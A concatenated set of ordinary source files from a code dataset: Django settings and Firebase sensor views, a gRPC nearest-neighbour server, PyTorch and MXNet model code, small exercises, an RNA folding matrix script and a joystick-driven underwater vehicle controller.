{\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'django',\n 'USER': 'django',\n 'HOST': 'db',\n 'PORT': 5432,\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': ['/src/templates/'],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'debug': True,\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.8/howto/static-files/\n\nSTATICFILES_DIRS = (\n '/static/',\n)\n\nSTATIC_URL = '/static/'\n\n# User uploads\n\nMEDIA_URL = '/media/'\n\nMEDIA_ROOT = '/media/'\n\nREST_FRAMEWORK = {\n 'URL_FIELD_NAME': 'slug'\n}\n","repo_name":"domasx2/django-angular-docker-seed","sub_path":"backend/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"31021735482","text":"\nfrom concurrent import futures\nimport time\n\nimport grpc\n\nimport prediction_pb2\nimport prediction_pb2_grpc\n\nfrom sklearn import neighbors\nimport numpy as np\n\n_ONE_DAY_IN_SECONDS = 60 * 60 * 24\n\n\n# read csv file into numpy\nx = np.genfromtxt(\"C:\\\\data\\\\x.csv\", dtype=np.float64, delimiter=',', skip_header=1)\ny = np.genfromtxt(\"C:\\\\data\\\\y.csv\", dtype=np.float64, delimiter=',', skip_header=1)\n\ndef lnglatWeights(row,geo_multiplier, park_multiplier):\n return [row[0],row[1],row[2]*park_multiplier,row[3]*geo_multiplier,row[4]*geo_multiplier];\n\ngeo_rate = 100000000.\npark_rate = 0.6\n\nx = np.apply_along_axis(lnglatWeights, 1, x, geo_rate, park_rate)\nprint(x)\nprint(y)\n\n\nknc = neighbors.KNeighborsClassifier(algorithm='auto')\n\nknc.fit(x, y)\n\n\nclass PredictionServer(prediction_pb2_grpc.PredictionServiceServicer):\n\n def FindNearestHouseIndices(self, request, context):\n print(request)\n results = knc.kneighbors([[request.NumberOfBedrooms,\n request.NumberOfBathrooms,\n request.NumberOfParkings * park_rate,\n request.Latitude * geo_rate, \n request.Longitude * geo_rate]])\n return prediction_pb2.PredictionResponse(Indices=results[1][0])\n\nport = 51666\n\ndef serve():\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\n prediction_pb2_grpc.add_PredictionServiceServicer_to_server(PredictionServer(), server)\n server.add_insecure_port('[::]:{}'.format(port))\n server.start()\n print(\"Prediction Server: {}\".format(port))\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n server.stop(0)\n\n\nif __name__ == '__main__':\n serve()\n","repo_name":"JacobXing/HousePriceScraper","sub_path":"Model/py_server.py","file_name":"py_server.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1759146241","text":"from typing import re\n\nfrom django.shortcuts import render\nfrom firebase import firebase\n# Create your views here.\nfirebase = firebase.FirebaseApplication('https://smarthomev01-626ae.firebaseio.com')\n\ndef sensor_home(request):\n if request.method != \"POST\":\n #result = firebase.get('/test', 'GPIO')\n #print(result)\n '''global LED_status\n LED_status = not LED_status\n firebase.put('/Sensor', 'LED_status', LED_status)'''\n fb_sensor_obj = firebase.get('/Sensor',None)\n print (fb_sensor_obj)\n gas = fb_sensor_obj['GAS']\n rain = fb_sensor_obj['Rain']\n temp_i = fb_sensor_obj['Temp_I']\n temp_o = fb_sensor_obj['Temp_O']\n context={'GAS': gas,\n 'Rain': rain,\n 'Temp_I': temp_i,\n 'Temp_O': temp_o,\n }\n return render(request,\"home.html\",context)\n else:\n return render(request,\"home.html\")\n\ndef RFID_log(request):\n fb_RFID_obj = firebase.get('/Log',None)\n context = {'RFID_log':fb_RFID_obj,\n }\n print(fb_RFID_obj)\n return render(request,\"RFID.html\",context)\n\ndef setting(request):\n if (request.method == \"POST\" and request.POST.get(\"ON\",\"\")):\n rs = 1\n firebase.put(\"/Setting\",\"Rain_status\",rs)\n elif (request.method == \"POST\" and request.POST.get(\"OFF\",\"\")):\n rs = 0\n firebase.put(\"/Setting\",\"Rain_status\",rs)\n elif (request.method == \"POST\" and request.POST.get(\"OK\",\"\")):\n gs = float(request.POST.get(\"gs\"))\n firebase.put(\"/Setting\",\"GAS_alert\",gs)\n fb_setting_obj = firebase.get('/Setting',None)\n GAS_alert = fb_setting_obj['GAS_alert']\n Rain_status = fb_setting_obj['Rain_status']\n print(Rain_status)\n if (Rain_status == 1):\n Rain_status = \"ON\"\n\n elif (Rain_status == 0):\n Rain_status = \"OFF\"\n\n else: Rain_status = \"ERROR\"\n context = {'GAS_alert':GAS_alert,\n 'Rain_status':Rain_status,\n }\n return render(request,\"setting.html\",context)","repo_name":"rsxss/Smart_Home","sub_path":"ESP8266_Smart_Home/Sensor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22245938850","text":"from math import pi\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport torch\r\nfrom net_2d import *\r\nfrom nolinear import *\r\n\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpudir\")\r\nprint(device)\r\n# train_dataset = MyDataset(data_path=\"jihuo/\",data_name=\"data6.txt\",data_lable=\"label6.txt\",transform=transforms.ToTensor())\r\nx = np.loadtxt(\"data2d_4_withempty(1).txt\",delimiter=\" \")\r\nx = torch.from_numpy(x).reshape(-1,1).float()\r\nx = x.to(device)\r\nprint(x.is_cuda)\r\ny = np.loadtxt(\"label2d_4_withempty(1).txt\",delimiter=\" \")\r\ny = torch.from_numpy(y).reshape(-1,1).float()\r\ny =y.to(device)\r\nprint(y.is_cuda)\r\n\r\n#\r\nnet = nolinear().to(device)\r\nnet.load_state_dict(torch.load(\"data1d_12.pth\"))\r\n\r\nloss_fn = torch.nn.MSELoss()\r\nloss_fn.to(device)\r\n#创建优化器\r\nlearning_rata = 1e-4 / 3 #或者使用1e-2代替0.01\r\n# optimizer = torch.optim.SGD(net.parameters(),lr=learning_rata)\r\noptimizer = torch.optim.Adam(net.parameters(), lr=learning_rata)\r\n\r\n#训练的次数\r\ntotal_train_step = 0\r\n#测试次数\r\ntotal_test_step = 0\r\n#训练轮数\r\nR =50\r\n\r\n# c = torch.from_numpy(np.linspace(0, 1, num=640)).reshape(-1, 1).float()\r\n# print(c)\r\n# d = net(c)\r\n\r\n# writer = SummaryWriter(\"log_maxernet\")\r\n# start_time = time.time()\r\ntrain_num = 0\r\nnum_of_true = 0\r\ncount =0\r\n\r\n# z = torch.tensor([[1/20]])\r\n\r\n# y=net(z)\r\n\r\n# print(y)\r\n\r\n\r\n\r\nfor t in range(30000):\r\n # Forward pass: compute predicted y by passing x to the model.\r\n # for name,para in net.named_parameters():\r\n # print(para)\r\n y_pred = net(x)\r\n # print(\"\\n\")\r\n \r\n # Compute loss and print it periodically\r\n loss = loss_fn(y_pred, y)\r\n \r\n if t % 100 == 0:\r\n print(t, loss.item())\r\n \r\n # if t % stepnum == 0:\r\n # print(scheduler.get_lr())\r\n \r\n \r\n # Update the network weights using gradient of the loss\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n # scheduler.step()\r\nif(loss.item()<=0.25):\r\n # torch.save(net,\"data2d_4(2).pth\")\r\n torch.save(net.state_dict(),\"data1d_12.pth\")\r\n \r\n# Draw the original random points as a scatter plot\r\nplt.figure()\r\n# fig.add_trace(plt.Scatter(x=x.flatten().numpy(), y=y.flatten().numpy(), mode=\"markers\"))\r\n \r\n# Generate predictions for evenly spaced x-values between minx and maxx\r\nminx = min(list(x.cpu().numpy()))\r\nmaxx = max(list(x.cpu().numpy()))\r\nc = torch.from_numpy(np.linspace(minx, maxx, num=640)).reshape(-1, 1).float().to(device)\r\nd = net(c)\r\n \r\n# Draw the predicted functions as a line graph\r\nplt.title(label = \"nolinear\")\r\nplt.scatter(x=x.cpu().flatten().numpy(), y=y.cpu().flatten().numpy(), c=\"r\",marker=\".\")\r\n# plt.scatter(x=c.flatten().numpy(), y=d.flatten().detach().numpy(), c=\"b\",marker=\".\")\r\nplt.plot(c.cpu().flatten().numpy(), d.cpu().flatten().detach().numpy())\r\nplt.show()","repo_name":"hour-glass110/iteration","sub_path":"testsinnet.py","file_name":"testsinnet.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33783781848","text":"import mxnet as mx\nimport mxnext as X\nfrom mxnext import dwconv, conv, relu6, add, global_avg_pool, sigmoid, to_fp16, to_fp32\nfrom mxnext.backbone.resnet_v1b_helper import resnet_unit\nfrom symbol.builder import Backbone\n\n\ndef _make_divisible(dividend, divisor):\n if dividend % divisor == 0:\n return dividend\n else:\n return (dividend // divisor + 1) * divisor\n\nround32 = lambda dividend: _make_divisible(dividend, 32)\n\n\ndef se(input, prefix, f_down, f_up):\n with mx.name.Prefix(prefix + \"_\"):\n gap = mx.sym.mean(input, axis=-1, keepdims=True)\n gap = mx.sym.mean(gap, axis=-2, keepdims=True)\n fc1 = conv(gap, name=\"fc1\", filter=f_down)\n fc1 = relu6(fc1, name=\"fc1_relu\")\n fc2 = conv(fc1, name=\"fc2\", filter=f_up)\n att = sigmoid(fc2, name=\"sigmoid\")\n input = mx.sym.broadcast_mul(input, att, name=\"mul\")\n\n return input\n\n\ndef convnormrelu(input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs):\n with mx.name.Prefix(prefix + \"_\"):\n conv1 = conv(input, name=\"conv1\", filter=f_out, kernel=kernel, stride=stride, no_bias=False)\n bn1 = norm(conv1, name=\"bn1\")\n relu1 = relu6(bn1, name=\"relu1\")\n return relu1\n\n\ndef mbconv(input, prefix, kernel, f_in, f_out, stride, proj, bottleneck_ratio, norm, **kwargs):\n with mx.name.Prefix(prefix + \"_\"):\n if bottleneck_ratio != 1:\n conv1 = conv(input, name=\"conv1\", filter=f_in * bottleneck_ratio, no_bias=False)\n bn1 = norm(conv1, name=\"bn1\")\n relu1 = relu6(bn1, name=\"relu1\")\n else:\n relu1 = input\n\n conv2 = dwconv(relu1, name=\"conv2\", filter=f_in * bottleneck_ratio,\n kernel=kernel, stride=stride, no_bias=False)\n bn2 = norm(conv2, name=\"bn2\")\n relu2 = relu6(bn2, name=\"relu2\")\n relu2 = se(relu2, prefix=prefix + \"_se2\", f_down=f_in//4, f_up=f_in * bottleneck_ratio)\n\n conv3 = conv(relu2, name=\"conv3\", filter=f_out, no_bias=False)\n bn3 = norm(conv3, name=\"bn3\")\n\n if proj:\n return bn3\n else:\n return bn3 + input\n\n\nmbc1 = lambda input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs: \\\n mbconv(input, prefix, kernel, f_in, f_out, stride, proj, 1, norm, **kwargs)\nmbc6 = lambda input, prefix, kernel, f_in, f_out, stride, proj, norm, **kwargs: \\\n mbconv(input, prefix, kernel, f_in, f_out, stride, proj, 6, norm, **kwargs)\n\n\ndef efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs):\n stages = []\n for i, (u, fo, fi, s, k, c) in enumerate(zip(us, fos, fis, ss, ks, cs), start=1):\n for j in range(1, u + 1):\n s = s if j == 1 else 1\n proj = True if j == 1 else False\n fi = fi if j == 1 else fo\n data = c(data, prefix=\"stage%s_unit%s\" % (i, j), f_in=fi, f_out=fo,\n kernel=k, stride=s, proj=proj, norm=norm)\n stages.append(data)\n return stages\n\n\ndef efficientnet_b4(data, norm, **kwargs):\n # 1.5 GFLOPs\n us = [1, 2, 4, 4, 6, 6, 8, 2, 1]\n fos = [48, 24, 32, 56, 112, 160, 272, 448, 1792]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b5(data, norm, **kwargs):\n # 2.3 GFLOPs\n us = [1, 3, 5, 5, 7, 7, 9, 3, 1]\n fos = [48, 24, 40, 64, 128, 172, 304, 512, 2048]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n # ks = [3, 5, 5, 5, 5, 5, 5, 5, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b6(data, norm, **kwargs):\n # 3.3 GFLOPs\n us = [1, 3, 6, 6, 8, 8, 11, 3, 1]\n fos = [56, 32, 40, 72, 144, 200, 344, 576, 2304]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_b7(data, norm, **kwargs):\n # 5.1 GFLOPs\n us = [1, 4, 7, 7, 10, 10, 13, 4, 1]\n fos = [64, 32, 48, 80, 160, 224, 384, 640, 2560]\n fis = [0] + fos[:-1]\n ss = [2, 1, 2, 2, 2, 1, 2, 1, 1]\n ks = [3, 3, 3, 5, 3, 5, 5, 3, 1]\n cs = [convnormrelu, mbc1, mbc6, mbc6, mbc6, mbc6, mbc6, mbc6, convnormrelu]\n return efficientnet_helper(data, norm, us, fos, fis, ss, ks, cs)\n\n\ndef efficientnet_fpn_builder(efficientnet):\n class EfficientNetFPN(Backbone):\n def __init__(self, pBackbone):\n super().__init__(pBackbone)\n p = self.p\n data = X.var(\"data\")\n if p.fp16:\n data = data.astype(\"float16\")\n stages = efficientnet(data, p.normalizer, params=p)\n self.symbol = (stages[2], stages[3], stages[5], stages[8])\n\n def get_rpn_feature(self):\n return self.symbol\n\n def get_rcnn_feature(self):\n return self.symbol\n return EfficientNetFPN\n\n\nEfficientNetB4FPN = efficientnet_fpn_builder(efficientnet_b4)\nEfficientNetB5FPN = efficientnet_fpn_builder(efficientnet_b5)\nEfficientNetB6FPN = efficientnet_fpn_builder(efficientnet_b6)\nEfficientNetB7FPN = efficientnet_fpn_builder(efficientnet_b7)\n\n\nif __name__ == \"__main__\":\n data = X.var(\"data\")\n norm = X.normalizer_factory()\n *_, last = efficientnet_b4(data, norm)\n mx.viz.print_summary(last, shape={\"data\": (1, 3, 224, 224)})\n","repo_name":"tusen-ai/simpledet","sub_path":"models/efficientnet/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":3070,"dataset":"github-code","pt":"72"} +{"seq_id":"15190157526","text":"cores = {'limpa':'\\033[m',\n 'branco':'\\033[30m',\n 'vermelho':'\\033[31m',\n 'verde':'\\033[32m',\n 'amarelo':'\\033[33m',\n 'azul':'\\033[34m',\n 'roxo':'\\033[35m',\n 'azulclaro':'\\033[36m',\n 'cinza':'\\033[37m',\n 'pretoebranco':'\\033[7;30m'}\n\nvel = int(input('Digite a velocidade do carro: '))\nif vel > 80:\n print('Você receberá uma multa no valor de R${}.'.format(7*(vel-80)))\nelse:\n print('Tenha um bom dia! Dirija com segurança!')","repo_name":"VitorFRodrigues/Python-curso","sub_path":"PythonExercicios/ex029.py","file_name":"ex029.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17986197327","text":"\"\"\"\nAs Dr. Aziz allowed us to make a program that fills the matrix for us, I am writing this script to do the job. \n\n\nThe sequence in question:\n5'-UGCUCCUAGUACGAGAGGACCGGAGUG-3'\n\nJob: Apply NJ algorithm.\n\"\"\"\n\nimport numpy as np\nimport seaborn as sns; sns.set()\nimport matplotlib.pyplot as plt\n\nseq = 'UGCUCCUAGUACGAGAGGACCGGAGUG'\n\ndef score(i, j):\n ri = seq[i]\n rj = seq[j]\n\n if (ri == 'G' and rj == 'C') or (ri == 'C' and rj == 'G'):\n return 3\n \n if (ri == 'A' and rj == 'U') or (ri == 'U' and rj == 'A'):\n return 2\n\n if (ri == 'G' and rj == 'U') or (ri == 'U' and rj == 'G'):\n return 1\n\n return 0\n\ndef fourth_condition_calculator(i, j, matrix):\n k = i + 1\n\n vals = []\n\n if k >= j:\n return 0\n\n while (k > i and k < j):\n vals += [matrix[i][k] + matrix[k+1][j]]\n k += 1\n\n return max(vals)\n\n\ndef main():\n\n length = len(seq)\n matrix = np.zeros((length, length), dtype= int)\n \n for j in range(1,length):\n for i in range(0, j):\n\n if (j - i) < 4:\n matrix[i][j] = 0\n continue\n \n bottom = matrix[i+1][j]\n left = matrix[i][j-1]\n diag = matrix[i+1][j-1] + score(i,j)\n fourth_condition = fourth_condition_calculator(i,j, matrix)\n\n matrix[i][j] = max([bottom, left, diag, fourth_condition])\n\n \"\"\" \n Using the below three lines to plot my matrix\n \"\"\"\n from matplotlib.colors import ListedColormap\n\n with sns.axes_style('white'):\n sns.heatmap(matrix,\n cbar=False, \n square=False, \n annot=True, \n fmt='d', \n xticklabels=False, \n yticklabels=False, \n cmap=ListedColormap(['white']), \n linewidths=0.5)\n \n plt.show()\n\nmain()","repo_name":"soomro-abd/Computational-Biology","sub_path":"Assignment 3/part1_q3.py","file_name":"part1_q3.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14818991326","text":"\r\nimport Serial_1\r\nimport Serial_2\r\nimport valves\r\nimport pygame\r\nimport time\r\nimport os\r\n\r\n#############################################################\r\nglobal returned_dic\r\n###################\r\nglobal roll_val\r\nglobal pitch_val\r\nglobal yaw_val\r\nglobal accx\r\nglobal accy\r\nglobal accz\r\nglobal patm\r\nglobal depth\r\nglobal uw\r\nglobal temp\r\nglobal warning\r\nglobal front_1\r\nglobal front_2\r\nglobal Rear_1\r\nglobal Rear_2\r\nglobal up_1\r\nglobal up_2\r\nglobal valve1\r\nglobal valve2\r\nglobal valve3\r\nglobal valve4\r\n###################\r\nglobal ser1_status\r\nglobal ser2_status\r\nglobal IMU_status\r\nglobal Pressure_status\r\nglobal joystick_status\r\n###################\r\nglobal joystick\r\n\r\nglobal y1\r\nglobal x2\r\nglobal x3\r\nglobal y3\r\nglobal AB\r\nglobal BB\r\nglobal XB\r\nglobal YB\r\nglobal LB\r\nglobal RB\r\n#############################################################\r\nroll_val=1\r\npitch_val=2\r\nyaw_val=3\r\naccx=4\r\naccy=5\r\naccz=6\r\npatm=7\r\ndepth=8\r\nuw=9\r\ntemp=10\r\nwarning=11\r\nfront_1=12\r\nfront_2 = 13\r\nRear_1 = 14\r\nRear_2=15\r\nup_1=16\r\nup_2=17\r\nvalve1=0\r\nvalve2=0\r\nvalve3=0\r\nvalve4=0\r\n\r\ny1=0\r\nx2=0\r\nx3=0\r\ny3=0\r\n\r\n\r\n\r\nAB=0\r\nBB=0\r\nXB=0\r\nYB=0\r\nLB=0\r\nRB=0\r\n\r\n###################\r\nser1_status = False\r\nser2_status=False\r\nIMU_status= False\r\nPressure_status= False\r\njoystick_status= False\r\n#############################################################\r\ndef map_RPM(value, input_min, input_max, output_min, output_max):\r\n output_value = (value - input_min) * (output_max - output_min) / (input_max - input_min) + output_min\r\n RPM = (-1.5933631381478e-5)*(output_value**3) + 0.0720860955611188*(output_value**2) - 98.9465426312546*output_value + 39966.4666710835\r\n return RPM\r\n\r\ndef Serial_1_try_connect():\r\n if Serial_1.Get_status()==False:\r\n Serial_1.try_connect()\r\n\r\ndef Serial_2_try_connect():\r\n if Serial_2.Get_status()==False:\r\n Serial_2.try_connect()\r\n \r\n\r\ndef Serial_1_Get_status():\r\n return Serial_1.Get_status()\r\n\r\ndef Serial_2_Get_status():\r\n return Serial_2.Get_status()\r\n\r\ndef return_data():\r\n global returned_dic\r\n # print(returned_dic)\r\n return returned_dic\r\n\r\n \r\n#############################################################\r\n\r\n\r\n\r\n# initialize the joystick module\r\npygame.init()\r\n\r\n\r\nSerial_1.try_connect()\r\nSerial_2.try_connect()\r\n\r\n\r\n# loop to continuously read the joystick values and send them to Arduino\r\ndef Run():\r\n #############################################################\r\n global returned_dic\r\n ###################\r\n global roll_val\r\n global pitch_val\r\n global yaw_val\r\n global accx\r\n global accy\r\n global accz\r\n global patm\r\n global depth\r\n global uw\r\n global temp\r\n global warning\r\n global front_1\r\n global front_2\r\n global Rear_1\r\n global Rear_2\r\n global up_1\r\n global up_2\r\n global valve1\r\n global valve2\r\n global valve3\r\n global valve4\r\n ###################\r\n global ser1_status\r\n global ser2_status\r\n global IMU_status\r\n global Pressure_status\r\n global joystick_status\r\n ###################\r\n global joystick\r\n\r\n global y1\r\n global x2\r\n global x3\r\n global y3\r\n global AB\r\n global BB\r\n global XB\r\n global YB\r\n global LB\r\n global RB\r\n \r\n \r\n #############################################################\r\n \r\n try:\r\n joystick = pygame.joystick.Joystick(0)\r\n joystick.init()\r\n pygame.event.get()\r\n joystick_status=True\r\n \r\n \r\n except:\r\n # joystick.quit()\r\n joystick_status=False\r\n\r\n # print(pygame.joystick.get_count())\r\n\r\n \r\n\r\n\r\n\r\n if joystick_status==True:\r\n \r\n \r\n y1=joystick.get_axis(1) \r\n # print(y1)\r\n x2=joystick.get_axis(2) \r\n x3=joystick.get_axis(4)\r\n y3=joystick.get_axis(5)\r\n\r\n # print(y1,x2,x3,y3)\r\n \r\n AB=joystick.get_button(0)\r\n BB=joystick.get_button(1)\r\n XB=joystick.get_button(2)\r\n YB=joystick.get_button(3)\r\n LB=joystick.get_button(4)\r\n RB=joystick.get_button(5)\r\n\r\n if(x3==0 and y3==0):\r\n joystick_status=False\r\n\r\n \r\n\r\n\r\n\r\n # read the joystick axes and normalize their values to between 0 and 180\r\n BUTTON_FORW_BACK= int(y1 * 90 + 90) #0\r\n BUTTON_LR = int(x2 * 90 + 90) #2\r\n BUTTON_UP = int(y3 * 90 + 90) #4\r\n BUTTON_DOWN = int(x3* 90 + 90) #5\r\n # readRPM values to between 0 and 3075\r\n\r\n print(BUTTON_FORW_BACK,BUTTON_LR,BUTTON_UP,BUTTON_DOWN)\r\n\r\n forw_ = map_RPM(BUTTON_FORW_BACK, 70, 0, 1500, 1850)\r\n back_ = map_RPM(BUTTON_FORW_BACK, 100, 180, 1500, 1150)\r\n right = map_RPM(BUTTON_LR, 70, 0, 1500, 1850)\r\n right_1 = map_RPM(BUTTON_LR, 70, 0, 1500, 1150)\r\n left = map_RPM(BUTTON_LR, 100, 180, 1500, 1150)\r\n left_1 = map_RPM(BUTTON_LR, 100, 180, 1500, 1850)\r\n UP = map_RPM(BUTTON_UP, 90, 170, 1500, 1850)\r\n DOWN = map_RPM(BUTTON_DOWN, 90, 170, 1500, 1150)\r\n \r\n if (BUTTON_FORW_BACK < 70 and not (BUTTON_LR > 100 or BUTTON_LR < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=forw_\r\n front_2 = forw_\r\n Rear_1 = forw_\r\n Rear_2=forw_\r\n up_1=0\r\n up_2=0\r\n \r\n elif (BUTTON_FORW_BACK > 100 and not (BUTTON_LR > 100 or BUTTON_LR < 80) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=back_\r\n front_2 = back_\r\n Rear_1 = back_\r\n Rear_2=back_\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_LR < 70 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=right\r\n front_2 = right\r\n Rear_1 = right_1\r\n Rear_2=right_1\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_LR > 100 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not BUTTON_DOWN > 0 and not BUTTON_UP > 0):\r\n front_1=left\r\n front_2 = left\r\n Rear_1 = left_1\r\n Rear_2=left_1\r\n up_1=0\r\n up_2=0\r\n elif (BUTTON_DOWN > 0 and not BUTTON_UP > 0 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not (BUTTON_LR > 100 or BUTTON_LR < 70)):\r\n up_1=DOWN\r\n up_2=DOWN\r\n elif (BUTTON_UP > 0 and not BUTTON_DOWN > 0 and not (BUTTON_FORW_BACK > 100 or BUTTON_FORW_BACK < 70) and not (BUTTON_LR > 100 or BUTTON_LR < 70)):\r\n up_1=UP\r\n up_2=UP\r\n else:\r\n front_1=0\r\n front_2 = 0\r\n Rear_1 = 0\r\n Rear_2=0\r\n up_1=0\r\n up_2=0\r\n \r\n\r\n data_motors=\"#\"+str(BUTTON_FORW_BACK)+\"|\"+str(BUTTON_LR)+\"|\"+str(BUTTON_UP)+\"|\"+str(BUTTON_DOWN)+\"|\"+str((time.time()*20)%2)+\"|\"+str(int(joystick_status))+\"*\"+'\\n'\r\n Serial_2.write(data_motors) \r\n\r\n #print()\r\n\r\n data_valves=\"#\"+str(int(valve1))+\"|\"+str(int(valve2))+\"|\"+str(int(valve3))+\"|\"+str(int(valve4))+\"*\"+'\\n'\r\n Serial_1.write(data_valves)\r\n \r\n\r\n\r\n Serial_1.Get_Data_With_Format('#', '|', '*')\r\n\r\n #print(Serial_1.Get_Var(8))\r\n\r\n patm=Serial_1.Get_Var(1)/1000\r\n uw = Serial_1.Get_Var(2)/1000\r\n depth = Serial_1.Get_Var(3)/100\r\n temp=Serial_1.Get_Var(4)/10\r\n\r\n accx=Serial_1.Get_Var(5)/98\r\n accy=Serial_1.Get_Var(6)/98\r\n accz=Serial_1.Get_Var(7)/98\r\n\r\n pitch_val=Serial_1.Get_Var(8)\r\n roll_val=Serial_1.Get_Var(9)\r\n yaw_val=Serial_1.Get_Var(10)\r\n\r\n \r\n ser1_status=Serial_1.Get_status()\r\n ser2_status=Serial_2.Get_status()\r\n\r\n valve1=valves.process(AB,BB,XB,YB,LB,RB)[0]\r\n valve2=valves.process(AB,BB,XB,YB,LB,RB)[1]\r\n valve3=valves.process(AB,BB,XB,YB,LB,RB)[2]\r\n valve4=valves.process(AB,BB,XB,YB,LB,RB)[3]\r\n\r\n if ser1_status == True:\r\n Pressure_status=Serial_1.Get_Var(11)\r\n IMU_status=Serial_1.Get_Var(12)\r\n else:\r\n Pressure_status=0\r\n IMU_status=0\r\n\r\n\r\n\r\n\r\n returned_dic={'Roll': roll_val , \r\n 'Pitch': pitch_val,\r\n 'Yaw': yaw_val,\r\n 'Accelx': round(accx,3) ,\r\n 'Accely': round(accy,3),\r\n 'Accelz': round(accz,3),\r\n 'patm': patm,\r\n 'depth': depth,\r\n 'underwater': uw,\r\n 'temp': temp ,\r\n 'ser1_status' : ser1_status , \r\n 'ser2_status' :ser2_status ,\r\n 'IMU_status' : IMU_status ,\r\n 'Pressure_status' : Pressure_status,\r\n 'joystick_status' : joystick_status,\r\n 'front_1' : int(front_1) ,\r\n 'front_2' : int(front_2) ,\r\n 'Rear_1' : int(Rear_1) ,\r\n 'Rear_2' : int(Rear_2) , \r\n 'up_1' : int(up_1) ,\r\n 'up_2' : int(up_2) , \r\n 'valve1' : bool(valve1) , \r\n 'valve2' : bool(valve2) , \r\n 'valve3' : bool(valve3) , \r\n 'valve4' : bool(valve4) , \r\n }\r\n\r\n\r\n if Serial_1.Get_status()==False:\r\n Serial_1_try_connect()\r\n\r\n if Serial_2.Get_status()==False:\r\n Serial_2_try_connect()\r\n\r\n os.system('cls' if os.name=='nt' else 'clear')\r\n print(return_data())\r\n\r\n # print(valve1,valve2,valve3,valve4)\r\n \r\n time.sleep(0.01)\r\n\r\nwhile True:\r\n Run()\r\n\r\n\r\n '''\r\n To write:\r\n Serial_x.write(data) for example : \"#1|2|3*\"\r\n\r\n To read:\r\n Serial_x.Get_Data_With_Format(header, delimiter, terminator) for example: Serial_1.Get_Data_With_Format('#', '|', '*')\r\n Serial_1.Get_Var(index) for example: Serial_1.Get_Var(2)\r\n\r\n\r\n\r\n \r\n # Serial_1.write(data_valves) \r\n # Serial_1.Get_Data_With_Format('#', '|', '*')\r\n \r\n # pressure_abs=Serial_1.Get_Var(1)\r\n # pressure_sealevel = Serial_1.Get_Var(2)\r\n # DEPTH = Serial_1.Get_Var(3)\r\n # TEMPERATURE=Serial_1.Get_Var(4)\r\n # acc_x=Serial_1.Get_Var(5)\r\n # acc_y=Serial_1.Get_Var(6)\r\n # acc_z=Serial_1.Get_Var(7)\r\n # pitch=Serial_1.Get_Var(8)\r\n # roll=Serial_1.Get_Var(9)\r\n # yaw=Serial_1.Get_Var(10)\r\n #FLAG_bmp=Serial_1.Get_Var(11)\r\n #FLAG_MPU=Serial_1.Get_Var(12)\r\n\r\n\r\n\r\n # print(pressure_abs ,pressure_sealevel,DEPTH,TEMPERATURE,acc_x,acc_y,acc_z,pitch,roll,yaw)\r\n \r\n\r\n 